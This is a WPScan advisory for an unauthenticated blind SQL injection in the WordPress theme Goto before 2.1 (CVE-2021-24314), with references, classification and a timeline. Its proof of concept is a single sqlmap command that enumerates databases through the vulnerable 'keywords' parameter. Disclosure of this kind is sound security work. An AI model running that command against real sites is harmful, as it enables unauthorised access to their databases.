WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Goto < 2.1 - Unauthenticated Blind SQL Injection

Description

The theme did not sanitise, validate of escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an Unauthenticated SQL injection issue

Proof of Concept

sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords 

Affects Themes

goto
Fixed in version 2.1

References

CVE
CVE-2021-24314
URL
https://m0ze.ru/vulnerability/%5B2021-03-24%5D-%5BWordPress%5D-%5BCWE-89%5D-Goto-WordPress-Theme-v2.0.txt

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

m0ze

Verified

No

WPVDB ID
1cc6dc17-b019-49dd-8149-c8bba165eb30

Timeline

Publicly Published

2021-04-26 (about 1 years ago)

Added

2021-04-29 (about 1 years ago)

Last Updated

2021-05-17 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us